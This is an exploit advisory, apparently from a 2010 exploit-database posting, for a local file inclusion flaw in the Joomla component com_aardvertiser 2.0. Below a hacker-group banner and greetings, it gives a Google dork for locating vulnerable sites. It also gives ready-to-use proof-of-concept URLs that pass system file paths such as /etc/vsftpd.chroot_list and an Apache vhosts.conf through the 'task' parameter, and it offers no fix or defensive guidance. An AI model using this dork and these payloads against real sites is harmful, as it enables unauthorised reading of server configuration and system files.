Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability
# Published : 2010-05-13
# Author : eidelweiss
# Previous Title : BlaB! Lite <== 0.5 Remote File Inclusion Vulnerability
# Next Title : damianov.net Shoutbox XSS Vulnerability

========================================================================
Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability
========================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / __  /'__`                   0
0  /_,     ___   /_/_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/__<_  /'___  /    /`'__          0
0       / /    /   / __/  _  _   /           1
1       _ _ __   ____/ ____\ __\ ____/ _           0
0       /_//_//_/ _ /___/  /____/ /__/ /___/  /_/           1
1                   ____/ >> Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ########################################          1
0                    I'm eidelweiss member from Inj3ct0r Team          1
1                    ########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Download:	http://sourceforge.net/projects/aardvertiser/files/

Author:		eidelweiss
Contact:		eidelweiss[at]cyberservices.com
Thank`s:		r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
Greetz: 		all inj3ctor Team, yogyacarderlink Team, devilzc0de & all INDONESIAN HACKER`s

========================================================================

-=[Descripttion]=-

A Joomla 1.5 component for advertising items in a 'classified ads' style on a Joomla site complete with extra modules and plugins for improved functionality. 


	-=[Dork]=-

	inurl:/index.php?option=com_aardvertiser

	-=[Exploit]=-

	http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task= [lfi]
	http://localhost/index.php?option=com_aardvertiser&task= [lfi]

	-=[LFI]=-

	/etc/vsftpd.chroot_list
	/usr/local/etc/apache/vhosts.conf

	-=[ P0C ]=-

	http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task=/usr/local/etc/apache/vhosts.conf
	http://localhost/index.php?option=com_aardvertiser&task=/etc/vsftpd.chroot_list

=========================| -=[ E0F ]=- |=================================